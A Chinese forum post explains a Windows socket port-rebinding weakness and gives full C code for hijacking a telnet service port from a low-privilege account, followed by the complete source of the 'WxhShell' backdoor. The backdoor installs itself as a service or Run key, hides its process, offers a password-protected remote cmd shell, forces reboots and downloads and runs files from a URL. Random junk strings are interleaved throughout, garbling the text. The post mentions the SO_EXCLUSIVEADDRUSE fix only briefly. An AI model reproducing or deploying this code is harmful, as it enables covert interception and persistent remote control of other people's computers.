-
UID:1177
-
- 注册时间2006-03-21
- 最后登录2009-03-24
- 在线时间675小时
-
- 发帖3743
- 搜Ta的帖子
- 精华
1
- 铜板8
- 人品值493
- 贡献值9
- 交易币0
- 好评度3746
- 信誉值0
- 金币0
-
访问TA的空间加好友用道具
- 发帖
- 3743
- 铜板
- 8
- 人品值
- 493
- 贡献值
- 9
- 交易币
- 0
- 好评度
- 3746
- 信誉值
- 0
- 金币
- 0
- 所在楼道
|
在WINDOWS的SOCKET服务器应用的编程中,如下的语句或许比比都是: /WK1( B: s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); =ReSlt u|D L?c>W saddr.sin_family = AF_INET; E]r<t# KDA2
H> saddr.sin_addr.s_addr = htonl(INADDR_ANY); s vS)7]{cU sr(nd35 bind(s,(SOCKADDR *)&saddr,sizeof(saddr)); [UB*39D7 yw89*:A6 其实这当中存在在非常大的安全隐患,因为在winsock的实现中,对于服务器的绑定是可以多重绑定的,在确定多重绑定使用谁的时候,根据一条原则是谁的指定最明确则将包递交给谁,而且没有权限之分,也就是说低级权限的用户是可以重绑定在高级权限如服务启动的端口上的,这是非常重大的一个安全隐患。 bMv[.Z@v( \%V !&
!' 这意味着什么?意味着可以进行如下的攻击: Dqd2e&a\ \0 &$n 1。一个木马绑定到一个已经合法存在的端口上进行端口的隐藏,他通过自己特定的包格式判断是不是自己的包,如果是自己处理,如果不是通过127.0.0.1的地址交给真正的服务器应用进行处理。 %5@>
nC?`[ Z$6B}cz< 2。一个木马可以在低权限用户上绑定高权限的服务应用的端口,进行该处理信息的嗅探,本来在一个主机上监听一个SOCKET的通讯需要具备非常高的权限要求,但其实利用SOCKET重绑定,你可以轻易的监听具备这种SOCKET编程漏洞的通讯,而无须采用什么挂接,钩子或低层的驱动技术(这些都需要具备管理员权限才能达到) ];N/KHeZ E]^n\bE% 3。针对一些的特殊应用,可以发起中间人攻击,从低权限用户上获得信息或事实欺骗,如在guest权限下拦截telnet服务器的23端口,如果是采用NTLM加密认证,虽然你无法通过嗅探直接获取密码,但一旦有admin用户通过你登陆以后,你的应用就完全可以发起中间人攻击,扮演这个登陆的用户通过SOCKET发送高权限的命令,到达入侵的目的。 LZE9]Gd jJ,y+o 4.对于构建的WEB服务器,入侵者只需要获得低级的权限,就可以完全达到更改网页目的,很简单,扮演你的服务器给予连接请求以其他信息的应答,甚至是基于电子商务上的欺骗,获取非法的数据。 ,wv>G]v 9JJ6$cLF 其实,MS自己的很多服务的SOCKET编程都存在这样的问题,telnet,ftp,http的服务实现全部都可以利用这种方法进行攻击,在低权限用户上实现对SYSTEM应用的截听。包括W2K+SP3的IIS也都一样,那么如果你已经可以以低权限用户入侵或木马植入的话,而且对方又开启了这些服务的话,那就不妨一试。并且我估计还有很多第三方的服务也大多存在这个漏洞。 s%6L94\t C^,J6;' 解决的方法很简单,在编写如上应用的时候,绑定前需要使用setsockopt指定SO_EXCLUSIVEADDRUSE要求独占所有的端口地址,而不允许复用。这样其他人就无法复用这个端口了。 }ov>b2H#< G{Uqp'=G 下面就是一个简单的截听ms telnet服务器的例子,在GUEST用户下都能成功进行截听,剩余的就是大家根据自己的需要,进行一些特殊剪裁的问题了:如是隐藏,嗅探数据,高权限用户欺骗等。 2=1qmQE @3FQMs4 #include LW">9;n #include ?wn<F}UH #include 6q
`Un} #include h,b_8g{! DWORD WINAPI ClientThread(LPVOID lpParam); aOsc_5XDR; int main() j_0l'S aj { m#RMd,'X WORD wVersionRequested; +OtD@lD`! DWORD ret; :&2%x WSADATA wsaData; 1Oak8 \G BOOL val; R"\(a SOCKADDR_IN saddr; dX[Xe SOCKADDR_IN scaddr; ;4Xx5*E int err; r/HG{XH` SOCKET s; Ea0EG>Y SOCKET sc; bBGg4{ int caddsize; lEb H4 g HANDLE mt; u
bZ`Y$ DWORD tid; e:_[0# wVersionRequested = MAKEWORD( 2, 2 ); |W&K@g$ err = WSAStartup( wVersionRequested, &wsaData ); EZhk(LE if ( err != 0 ) { mGoC8t}iP printf("error!WSAStartup failed!\n"); n,_9Eh#WD return -1; yD8Qy+6L } \{ C
~B;= saddr.sin_family = AF_INET; ![MtJo5 .G"T;w6d //截听虽然也可以将地址指定为INADDR_ANY,但是要不能影响正常应用情况下,应该指定具体的IP,留下127.0.0.1给正常的服务应用,然后利用这个地址进行转发,就可以不影响对方正常应用了 MiF(
&# WE-+WC!!: saddr.sin_addr.s_addr = inet_addr("192.168.0.60"); w7vQ6jkH saddr.sin_port = htons(23); [=u@6Y if((s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR) 0}T56aD=! { jW[EjhsH printf("error!socket failed!\n"); st#^pWL return -1; r|/9'{! } qQ,(O5$| val = TRUE; dwiLu& ]u //SO_REUSEADDR选项就是可以实现端口重绑定的 vVsaGW if(setsockopt(s,SOL_SOCKET,SO_REUSEADDR,(char *)&val,sizeof(val))!=0) f}?pY"yvO { ^1aY,6I: printf("error!setsockopt failed!\n"); t_(S e return -1; :r{W)(mm } 7ks!0`` //如果指定了SO_EXCLUSIVEADDRUSE,就不会绑定成功,返回无权限的错误代码; w[)HQ1K //如果是想通过重利用端口达到隐藏的目的,就可以动态的测试当前已绑定的端口哪个可以成功,就说明具备这个漏洞,然后动态利用端口使得更隐蔽 DQ0 UY //其实UDP端口一样可以这样重绑定利用,这儿主要是以TELNET服务为例子进行攻击 GpR,n2 JxM32?Rm*w if(bind(s,(SOCKADDR *)&saddr,sizeof(saddr))==SOCKET_ERROR) `/WOP`'zM { 2+R]q35- ret=GetLastError(); GW%!?mJ printf("error!bind failed!\n"); *GdJ<B$ return -1; %0 U@k!lP } x_/H listen(s,2); 2_Cp}Pj while(1) zW. Ltz { y\dx \ caddsize = sizeof(scaddr); &hZ6CV{ //接受连接请求 xr!A>q+@i sc = accept(s,(struct sockaddr *)&scaddr,&caddsize); !L/.[:X if(sc!=INVALID_SOCKET) G,(Xz"`, { i"E_nN"V mt = CreateThread(NULL,0,ClientThread,(LPVOID)sc,0,&tid); {~ w! if(mt==NULL) xZloEfv.B { `;m0GU68 printf("Thread Creat Failed!\n"); Z1(!syg break; Cwji,* } jDj=a->e^ } >:J1Gc CloseHandle(mt); =Fq{#sC> } 4r7aZDVA\ closesocket(s); 8. %g&%S WSACleanup(); u(ETc*D] return 0; `1FNs?j } yV&]i-ey DWORD WINAPI ClientThread(LPVOID lpParam) NxFCVqGb { )k `+9}OO SOCKET ss = (SOCKET)lpParam; V{}TG] SOCKET sc; F0kQ/x unsigned char buf[4096]; gDX\ p>7 SOCKADDR_IN saddr; >9<rc[ long num; XqcNFSo) DWORD val; 1D~B\=LL} DWORD ret; 7a.iT-* //如果是隐藏端口应用的话,可以在此处加一些判断 s(MdjWw //如果是自己的包,就可以进行一些特殊处理,不是的话通过127.0.0.1进行转发 90H/Txq saddr.sin_family = AF_INET; ;BHIss7 saddr.sin_addr.s_addr = inet_addr("127.0.0.1"); \z.p [;'ir saddr.sin_port = htons(23); |I.5]r-EK if((sc=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR) bF +d_t { .ffr2\'* printf("error!socket failed!\n"); 1 Va@w return -1; Z_T~2t } ^vOEG;TR<- val = 100; 5?E;YyA if(setsockopt(sc,SOL_SOCKET,SO_RCVTIMEO,(char *)&val,sizeof(val))!=0) J %E0Wd { clIn}wQ ret = GetLastError(); X{h[ return -1; 2D3mTpw } Ka"1gbJ| if(setsockopt(ss,SOL_SOCKET,SO_RCVTIMEO,(char *)&val,sizeof(val))!=0) iciRlx.$c { z qd1G(tO ret = GetLastError(); HLE%f; return -1; gM6o~ E } #vPk
XcP if(connect(sc,(SOCKADDR *)&saddr,sizeof(saddr))!=0) grJ(z)c { obgO-d9l printf("error!socket connect failed!\n"); Ti#x62X{ closesocket(sc); mx2Ov u closesocket(ss); .e5rKkkT return -1; q+XU Cnv } MLmv+ while(1) i \ .&8 { ^4{{ +G)j //下面的代码主要是实现通过127。0。0。1这个地址把包转发到真正的应用上,并把应答的包再转发回去。 :1#$p //如果是嗅探内容的话,可以再此处进行内容分析和记录 +^4HCyW //如果是攻击如TELNET服务器,利用其高权限登陆用户的话,可以分析其登陆用户,然后利用发送特定的包以劫持的用户身份执行。 W9A F} num = recv(ss,buf,4096,0); >R\!Qk if(num>0) 6%&w\<(SG send(sc,buf,num,0); Z>W&vDeuN else if(num==0) z7Z!wIzJ break; pWb8X}M num = recv(sc,buf,4096,0); }7qboUG e if(num>0) \F7NuG:m, send(ss,buf,num,0); YD5mJ[1t"2 else if(num==0) os+]ct break; }jNVR#D: } :,'.b|Tl.b closesocket(ss); U
a1Z,~ * closesocket(sc); ]TsmW ob return 0 ; 2]tW&y_i } AxCFZf 5 asbFNJG{ 6N.MCB^ ========================================================== M7(]NQ\TQ Lcs?2c:% 下边附上一个代码,,WXhSHELL cvV8; d ?,wEfwp ========================================================== <!?ZH"F0 ,u.A[{@py #include "stdafx.h" !\q'{x5C Acb %)Y #include <stdio.h> OX.g~M
ig| #include <string.h> ?"p.Gy) #include <windows.h>
8oJp_sw #include <winsock2.h> biHZyUJ #include <winsvc.h> BM02k\% #include <urlmon.h> d s}E|Q HB}iT1.` #pragma comment (lib, "Ws2_32.lib") )79F"ltzh #pragma comment (lib, "urlmon.lib") /,ISx} N9O}6 #define MAX_USER 100 // 最大客户端连接数 mFBuKp+0)h #define BUF_SOCK 200 // sock buffer ,.uI> #define KEY_BUFF 255 // 输入 buffer .gw6W0\F 8oP"?ew# #define REBOOT 0 // 重启 x\5\KGw16 #define SHUTDOWN 1 // 关机 /I0}(;^y %nj{eT #define DEF_PORT 5000 // 监听端口 <\?dPRw2> Gg5>~"pb #define REG_LEN 16 // 注册表键长度 .[vYT.LE #define SVC_LEN 80 // NT服务名长度 EB5^eNdL x<) T,c5Y // 从dll定义API ODPWFdRar typedef DWORD (WINAPI pREGISTERSERVICEPROCESS) (DWORD,DWORD); G5$YXNV typedef LONG (WINAPI *PROCNTQSIP)(HANDLE,UINT,PVOID,ULONG,PULONG); ezr'"1Ba} typedef BOOL (WINAPI *ENUMPROCESSMODULES) (HANDLE hProcess, HMODULE * lphModule, DWORD cb, LPDWORD lpcbNeeded); >NBwtF> typedef DWORD (WINAPI *GETMODULEBASENAME) (HANDLE hProcess, HMODULE hModule, LPTSTR lpBaseName, DWORD nSize); 2| ERif;) -p20UP 1I // wxhshell配置信息 Gq.fQ_oOb struct WSCFG { C33=<r[;N< int ws_port; // 监听端口 xx[l#+:c char ws_passstr[REG_LEN]; // 口令 bm(.(0MI int ws_autoins; // 安装标记, 1=yes 0=no }[ByN). char ws_regname[REG_LEN]; // 注册表键名 p+:MZP -%( char ws_svcname[REG_LEN]; // 服务名 o@r~KFIe char ws_svcdisp[SVC_LEN]; // 服务显示名 h.aXW]]}(P char ws_svcdesc[SVC_LEN]; // 服务描述信息 r59BBW)M char ws_passmsg[SVC_LEN]; // 密码输入提示信息 g|x*sZR~Y int ws_downexe; // 下载执行标记, 1=yes 0=no #lx(F3 char ws_fileurl[SVC_LEN]; // 下载文件的 url, " http://xxx/file.exe" Pb/[945 char ws_filenam[SVC_LEN]; // 下载后保存的文件名 1K{hj% h%U,g
9_ }; bVds23q ]goPjfWvU" // default Wxhshell configuration /Au7X'} struct WSCFG wscfg={DEF_PORT, -W)8Z. "xuhuanlingzhe",
m%i!;K"{s 1, K%NgZ(x( "Wxhshell", w#RfD "Wxhshell", gPy}.g{tH$ "WxhShell Service", !F#^Peb "Wrsky Windows CmdShell Service", O29GPs "Please Input Your Password: ", G8OnNI 1, 8>ODtKI* " http://www.wrsky.com/wxhshell.exe", pt9fOih[ "Wxhshell.exe" 8|IlJiJ~v }; (l:LG"sy\ jxDA+7 // 消息定义模块 3>G"&T{ char *msg_ws_copyright="\n\rWxhShell v1.0 (C)2005 http://www.wrsky.com\n\rMake by 虚幻灵者\n\r"; =E:a\r char *msg_ws_prompt="\n\r? for help\n\r#>"; 6G?7>M char *msg_ws_cmd="\n\ri Install\n\rr Remove\n\rp Path\n\rb reboot\n\rd shutdown\n\rs Shell\n\rx exit\n\rq Quit\n\r\n\rDownload:\n\r#> http://.../server.exe\n\r";
VKHzGfv char *msg_ws_ext="\n\rExit."; =~{W;VZt' char *msg_ws_end="\n\rQuit."; h2ou ] char *msg_ws_boot="\n\rReboot..."; 2<^eVpNJR char *msg_ws_poff="\n\rShutdown..."; cK1RmL"3 char *msg_ws_down="\n\rSave to "; cAzlkh QPp>%iE@ char *msg_ws_err="\n\rErr!"; m7,;Hr( char *msg_ws_ok="\n\rOK!"; C'fQ Z,r-v ZNY),3? char ExeFile[MAX_PATH]; J8PZVeWx int nUser = 0; u$y5?n| HANDLE handles[MAX_USER]; lgh+\pj int OsIsNt; 3b1%^@,ACy p|'Rm]&jb SERVICE_STATUS serviceStatus; xU$15|ny SERVICE_STATUS_HANDLE hServiceStatusHandle; '=>l& ; ug9]^p/)^ // 函数声明 JS0957K int Install(void); .Wvg{ S- int Uninstall(void); o\:vxj+%* int DownloadFile(char *sURL, SOCKET wsh); f5hf<R),A int Boot(int flag); *^.OqbO[U void HideProc(void); c$R<j'7 int GetOsVer(void); [knwp$ int Wxhshell(SOCKET wsl); U#F(%b-LC void TalkWithClient(void *cs); ^TCfj^FP int CmdShell(SOCKET sock); -n`2>L1 int StartFromService(void); .7MLgC; int StartWxhshell(LPSTR lpCmdLine); iLJBiZ+ <+e&E9;>6 VOID WINAPI NTServiceMain( DWORD dwArgc, LPTSTR *lpszArgv ); r*W&SU9Z VOID WINAPI NTServiceHandler( DWORD fdwControl );
@d6N[?3; q%8Ck)xz // 数据结构和表定义 \Gz
79VW SERVICE_TABLE_ENTRY DispatchTable[] = rZG6}<Hx { yI_MYL[ {wscfg.ws_svcname, NTServiceMain}, XQ$9E?|= {NULL, NULL} <5sP%Fs ) }; E JJW [fr!J?/@ // 自我安装 x.aqy'/` int Install(void) uKd79[1 { ak]H|D" 9 char svExeFile[MAX_PATH]; >Gxh=**F HKEY key; %vjfAdC strcpy(svExeFile,ExeFile); A7sva@}W UpCkB}OhR1 // 如果是win9x系统,修改注册表设为自启动 *Au[{sR if(!OsIsNt) { #=aT Sw X if(RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&key)==ERROR_SUCCESS) { @!2vS@f RegSetValueEx(key,wscfg.ws_regname,0,REG_SZ,(BYTE *)svExeFile,lstrlen(svExeFile)); PgwNE wG RegCloseKey(key); Z^ }4bR] if(RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",&key)==ERROR_SUCCESS) { rJ fO/WK RegSetValueEx(key,wscfg.ws_regname,0,REG_SZ,(BYTE *)svExeFile,lstrlen(svExeFile)); (j884bu RegCloseKey(key); Qe1WT T]:I return 0; PW GNUNc }
'' Pfs<! } ~MLBO } x @uowx_&m else { ?4MZT5 . 1|xo4fmV // 如果是NT以上系统,安装为系统服务 ,ko0XQBl SC_HANDLE schSCManager = OpenSCManager( NULL, NULL, SC_MANAGER_CREATE_SERVICE); _XUDPC(*qz if (schSCManager!=0) !vH={40 ] { UaV8!Z> SC_HANDLE schService = CreateService ;@G5s+<l ( h&m4"HBL_ schSCManager, $o>6Io|D wscfg.ws_svcname,
=U+_;;F= wscfg.ws_svcdisp, k2ZMDU SERVICE_ALL_ACCESS, {
^
@c96& SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS , ^F`\B'8MF SERVICE_AUTO_START, lxXIu8 SERVICE_ERROR_NORMAL, s!\Gi5b svExeFile, R)BH:wg" NULL, -{s9PZ3~_ NULL, cK~VNzsz NULL, 3pI) NULL, U~YjTjbd NULL yh"48@L'D ); pl5Q2zq% if (schService!=0) pJPP6Be< { W,sPg\G 3 CloseServiceHandle(schService); UWg+7RL CloseServiceHandle(schSCManager); <%EjrjdvL+ strcpy(svExeFile,"SYSTEM\\CurrentControlSet\\Services\\"); C+X-Cp strcat(svExeFile,wscfg.ws_svcname); 6eHw\$/ if(RegOpenKey(HKEY_LOCAL_MACHINE,svExeFile,&key)==ERROR_SUCCESS) { z)XIA)i6 RegSetValueEx(key,"Description",0,REG_SZ,(BYTE *)wscfg.ws_svcdesc,lstrlen(wscfg.ws_svcdesc)); I=}pT50~9 RegCloseKey(key);
1\ab3n return 0; )5U2-g#U } 2)47$eu } o&U/e\zy CloseServiceHandle(schSCManager); $JZ}=\n7 } G.sf>.[ } RL~]mI!U -q}I;
cH return 1; :dj=kuUTbu } gtw?u b e?
n8S // 自我卸载 &<oDl_^ int Uninstall(void) #i0f}& { a&s&6Q|Y HKEY key; Q!v]njCIB7 Xe> if(!OsIsNt) { EK<ly"S. if(RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&key)==ERROR_SUCCESS) { NJ$c0CNy RegDeleteValue(key,wscfg.ws_regname); ?D S|vCae RegCloseKey(key); F@u>5e^6 if(RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",&key)==ERROR_SUCCESS) { hxx`f-#= RegDeleteValue(key,wscfg.ws_regname); oiNt'HQ2/ RegCloseKey(key); V}+Ui]ie|I return 0; #JW~ &; } %8~g#Z } T$Rj/u
t1 } K1[(%<Gp else { |FH|l#bu> 2;&!]2vo$ SC_HANDLE schSCManager = OpenSCManager( NULL, NULL, SC_MANAGER_ALL_ACCESS); FG6mh,C! if (schSCManager!=0) ipn0WQG { ,G!mO,DX SC_HANDLE schService = OpenService( schSCManager, wscfg.ws_svcname, SERVICE_ALL_ACCESS); f4r)g2Zb[ if (schService!=0) 1OW#_4w/ { +DA,|~k_ if(DeleteService(schService)!=0) { sRDxa5<MD CloseServiceHandle(schService); 4&+lc* CloseServiceHandle(schSCManager); `/L D:R return 0; &1$|KbmV4 } a7wc>@9Q, CloseServiceHandle(schService); U#
7K^(E9 } XD$;K$_7 CloseServiceHandle(schSCManager); ?N(opggiD } L|A.;Gq } <A@qN95m .YxcXe3# return 1; a5@XD_b } U((mOm6 I2^Eo5' // 从指定url下载文件 *ci%c^}V int DownloadFile(char *sURL, SOCKET wsh) d td}P~ { fi;00>y HRESULT hr; Tg\wBhJr| char seps[]= "/"; %:/?eZ char *token; 1@{qPmf^ char *file; J!@`tR- char myURL[MAX_PATH]; 4+'d">+| char myFILE[MAX_PATH]; u:GDM 6R+EG{` strcpy(myURL,sURL); wTkcR^ token=strtok(myURL,seps); HA0Rv#p while(token!=NULL) *zTEK:+_ { qjI.Sr70 file=token; {axMS yp; token=strtok(NULL,seps); G+zIh}9 } FCA]zR1 2}jC%jR2 GetCurrentDirectory(MAX_PATH,myFILE); xI(Y}> strcat(myFILE, "\\"); *#g[
jl4 strcat(myFILE, file); Ft^+P* send(wsh,myFILE,strlen(myFILE),0); pIP^/H send(wsh,"...",3,0); N@G~+GCxL hr = URLDownloadToFile(0, sURL, myFILE, 0, 0); (7J (.EG2e if(hr==S_OK) G*\U'w4w|* return 0; '7(oCab"_ else *nc9u" return 1; $KMxq= 6h3TU,$r } fs;pX/:FR %% A==_b // 系统电源模块 *e}1KcJ int Boot(int flag) -G@:uxB { _rj B. HANDLE hToken; X>kW)c4{b TOKEN_PRIVILEGES tkp; kb2M3%6V I!;vy/r if(OsIsNt) { YqNI:znm- OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken); 5BsfbLKC LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid); T f;:C] tkp.PrivilegeCount = 1; _yP02a^2 tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; sTChbks AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,(PTOKEN_PRIVILEGES)NULL, 0); +#MQ8d if(flag==REBOOT) { fZF.eRP' if(ExitWindowsEx(EWX_REBOOT | EWX_FORCE, 0)) `(Ij@84
return 0; 7zEpuw } NQ qq\h else { 0FG|s#Ig if(ExitWindowsEx(EWX_POWEROFF | EWX_FORCE, 0)) Fooa~C" return 0; h(MS>= } MR-cO Pn } =VOl
* else { c?XqSK`',Z if(flag==REBOOT) { 0|D
l/1 if(ExitWindowsEx(EWX_REBOOT + EWX_FORCE,0)) e=Teq~K return 0; $ Ov#^wfA } %^
g(2^ else { m.DC if(ExitWindowsEx(EWX_SHUTDOWN + EWX_FORCE,0)) JDj^7\` return 0; $3D#U^7i } Bn?MlG;aA } AB")aX2%E SlojB ^% return 1; V^ 5Z9! } w;(B4^? kV:C=MLI // win9x进程隐藏模块 f+W8Gszi void HideProc(void) 2z615?2_U { #uillSV DY6ra% T HINSTANCE hKernel=LoadLibrary("Kernel32.dll"); }&:F,q* if ( hKernel != NULL ) ~u+|NtF { QB|D_?] pREGISTERSERVICEPROCESS *pRegisterServiceProcess=(pREGISTERSERVICEPROCESS *)GetProcAddress(hKernel,"RegisterServiceProcess"); rN5;W ( *pRegisterServiceProcess)(GetCurrentProcessId(),1); ga+Z6|t FreeLibrary(hKernel); k:k!4 } BLQD=?Q h(H b+7g return; TVEFZ\p<A } Y~+`F5xX< 1?N$I}? // 获取操作系统版本 dpI9DzA; int GetOsVer(void) RRBBz7:~ { PML+$ OSVERSIONINFO winfo; j+7ok 5J# winfo.dwOSVersionInfoSize=sizeof(OSVERSIONINFO); ZFO*D79:K GetVersionEx(&winfo); yNkE> if(winfo.dwPlatformId==VER_PLATFORM_WIN32_NT) -y5Zc?e return 1; 2=p"%YSn else B@@j- return 0; Th(F^W9 } n^7m^1to W99Hq1W;r // 客户端句柄模块 <;.->73E int Wxhshell(SOCKET wsl) PZsq9;P$ { I7/X6^/} SOCKET wsh; _z(ydL* struct sockaddr_in client; UZ}>@0 DWORD myID; UOtrq=y {%Ujp9i while(nUser<MAX_USER) I'%(f@u~ { D"RxI)"HP int nSize=sizeof(client); ~A =?_ 5kJ wsh=accept(wsl,(struct sockaddr *)&client,&nSize); 5xF R7%_& if(wsh==INVALID_SOCKET) return 1; 'YUx&FcM sM8 AORd handles[nUser]=CreateThread(0,1000,(LPTHREAD_START_ROUTINE) TalkWithClient,(VOID *) wsh, 0, &myID); vhaUV#V" if(handles[nUser]==0) zgR@-OtFZ closesocket(wsh); }2-p=Y:6 else "=r"c$xou nUser++; -yn;Jo2- } Up|>)WFw" WaitForMultipleObjects(MAX_USER,handles,TRUE,INFINITE); | *J-9 #v QyECf return 0; }4M4D/= } C;_*vi2u )ls<"WTC. // 关闭 socket )TFBb\f>v void CloseIt(SOCKET wsh) Q0cr^24/ { 6
SosVE>Z closesocket(wsh); q|fZdTw nUser--; !NfN16 ExitThread(0); Rf.b_Y@O } L_4ZxsIv m&X6a C'[ // 客户端请求句柄 oI6o$C void TalkWithClient(void *cs) gQ=g,X4 { QC\][I> U%,N"]` SOCKET wsh=(SOCKET)cs; o)hQ]d char pwd[SVC_LEN]; 9BM 8 char cmd[KEY_BUFF]; &QQ8ut,; char chr[1]; zrJ/Fs+s int i,j; |vY0[#E8& d|8iD`sZz while (nUser < MAX_USER) { %Kq`8 i`2X[kc if(wscfg.ws_passstr) { l[J'FR: if(strlen(wscfg.ws_passmsg)) send(wsh,wscfg.ws_passmsg,strlen(wscfg.ws_passmsg),0); z
nc' //send(wsh,wscfg.ws_passmsg,strlen(wscfg.ws_passmsg),0); T)NnWEB //ZeroMemory(pwd,KEY_BUFF); "RF<i3{S i=0; j7M[]/| while(i<SVC_LEN) { &]? X"K
G$"$k=[ // 设置超时 P95A_(T=[ fd_set FdRead; :W\xZ struct timeval TimeOut; +#c3Y;JP FD_ZERO(&FdRead); *Tt*\ O FD_SET(wsh,&FdRead); \|}dlG TimeOut.tv_sec=8; `=h`:` TimeOut.tv_usec=0; _@47h86Q int Er=select(wsh+1, &FdRead, NULL, NULL, &TimeOut); $"/xi ` if((Er==SOCKET_ERROR) || (Er==0)) CloseIt(wsh); 4mY(* 2:HC bf3Njma% if(recv(wsh,chr,1,0)==SOCKET_ERROR) CloseIt(wsh); UHEn+Tc> pwd =chr[0]; r6Hdp if(chr[0]==0xd || chr[0]==0xa) { S^Z[w|1 pwd=0; 0`
{6~p break; F9Ag687w } 9w=GB?/ i++; V~uH)IMkh7 } fb 8t9sAI z|V5/" // 如果是非法用户,关闭 socket =k1 ,jn+ if(strcmp(pwd,wscfg.ws_passstr)) CloseIt(wsh); d,G:+ } vNhi5EU <?UIux send(wsh,msg_ws_copyright,strlen(msg_ws_copyright),0); KnC;j-j send(wsh,msg_ws_prompt,strlen(msg_ws_prompt),0); /@<Pn&Rq z3 lZ3 while(1) { L.uX ByrK|lVM0 ZeroMemory(cmd,KEY_BUFF); \V#2K>< |nN{XjNfP5 // 自动支持客户端 telnet标准 rR4_=S<Mi: j=0; y0d a8sd) while(j<KEY_BUFF) { E2s
lpo if(recv(wsh,chr,1,0)==SOCKET_ERROR) CloseIt(wsh); ]mN'Qoc cmd[j]=chr[0]; DJ)z~W2I* if(chr[0]==0xa || chr[0]==0xd) { RN1q/H| cmd[j]=0; Bw31h3yB break; rSUarfZ< } G 1rsd j++; N;9m&)@JR' } #-_';Er\ U9[
&ci // 下载文件 k|$08EK $ if(strstr(cmd,"http://")) { mZ^z%+Ca| send(wsh,msg_ws_down,strlen(msg_ws_down),0); S0\;FmLIc if(DownloadFile(cmd,wsh)) bm>,$GW( send(wsh,msg_ws_err,strlen(msg_ws_err),0); QQso<.d& else v>FsP$p4yE send(wsh,msg_ws_ok,strlen(msg_ws_ok),0); "eq{_4dL } :@:i*2= else { HWJ(O/N lw4#xH-? switch(cmd[0]) { fWx
%?J CfguL@tR. // 帮助 :esHtkyML case '?': { d;3/Vr$t= send(wsh,msg_ws_cmd,strlen(msg_ws_cmd),0); BULf@8~( break; 9+G.86Iky } I+,~pmn: // 安装 v`"z
case 'i': { &@O]' if(Install()) [X'XxYbZ send(wsh,msg_ws_err,strlen(msg_ws_err),0); {8)Pke else .{` : send(wsh,msg_ws_ok,strlen(msg_ws_ok),0); W=fw*ro break; 4!pMZ<$3 } M^c`j#NQ // 卸载 U{vt9t case 'r': { g]IRv(gDh if(Uninstall()) x=g=e
<_ send(wsh,msg_ws_err,strlen(msg_ws_err),0); RKu'WD?sdH else 2sj[hI send(wsh,msg_ws_ok,strlen(msg_ws_ok),0); I%]~]a break; jN\} l|;q } *;QIAd // 显示 wxhshell 所在路径 b^wL{q case 'p': { &_-,Nxsf char svExeFile[MAX_PATH]; l^ P[nQDH strcpy(svExeFile,"\n\r"); "<3F[[;~ strcat(svExeFile,ExeFile); 6>rgoT)6~ send(wsh,svExeFile,strlen(svExeFile),0); Lo^0VD!O break; |H`}w2U[j } "|?zQ?E // 重启 @6eM{3E. case 'b': { nRYHp7` send(wsh,msg_ws_boot,strlen(msg_ws_boot),0); 5OUGln5 if(Boot(REBOOT)) "~R,%sYb( send(wsh,msg_ws_err,strlen(msg_ws_err),0); f}JiYZ else { h0}=C_.^ closesocket(wsh); F)ak5 ExitThread(0); ;GW[Yw>Rz } i6L>,^Dg break; `nAR/Ye } ;JM%O8 // 关机 q\2q3}n case 'd': { dWK;
h send(wsh,msg_ws_poff,strlen(msg_ws_poff),0); J#h2~Hz! if(Boot(SHUTDOWN)) ^I =W< send(wsh,msg_ws_err,strlen(msg_ws_err),0); ;D}8acQ else { {MP8B'r-6 closesocket(wsh); lSGtbSyDI ExitThread(0); pCXceNFo } +Bg$]~T break; kD&%
7Vz } 42* y27Dtm // 获取shell :ud<"I]: case 's': { @>>8CU^~ CmdShell(wsh); Y?ADM(j closesocket(wsh);
+#%#QL ExitThread(0); |m x)W} break; 97/"5i9 } =:)p\{B // 退出 }HO3D.HE^ case 'x': { C`qo send(wsh,msg_ws_ext,strlen(msg_ws_ext),0); #&fi[|%X$ CloseIt(wsh); b.h:~ATgN break; Gjhpi5?%8 } 'R'P^ // 离开 RO>3U2 case 'q': { uY{zZ4iw send(wsh,msg_ws_end,strlen(msg_ws_end),0); }BTK+Tk8 closesocket(wsh); 0;Lt WSACleanup(); ,8=`Y9# exit(1); /W vF}y break; m=g\@&N } 1(S0hm[ov } W9i}w& } %2H0JXKa, ?8ZOiY( // 提示信息 #b u]@/ if(strlen(cmd)) send(wsh,msg_ws_prompt,strlen(msg_ws_prompt),0); <OX_6d *@ } ( (.b& } x;Qs_"t];3 OZDd return; D<V[:~-o } Y^ Of ~3f`= r3/. // shell模块句柄
fP+RuZ int CmdShell(SOCKET sock) 4b\R@Knu { d@sAB1: STARTUPINFO si; JQi+y; ZeroMemory(&si,sizeof(si)); C)x>/Qr ~ si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; 47S1mxur si.hStdInput=si.hStdOutput =si.hStdError =(void *)sock; EC`!&Yp+ PROCESS_INFORMATION ProcessInfo; NOC8h\s}( char cmdline[]="cmd"; rM?O 2n CreateProcess(NULL,cmdline,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInfo); :6}Zo return 0; 9' $\GN{0 } 0m3:!#\
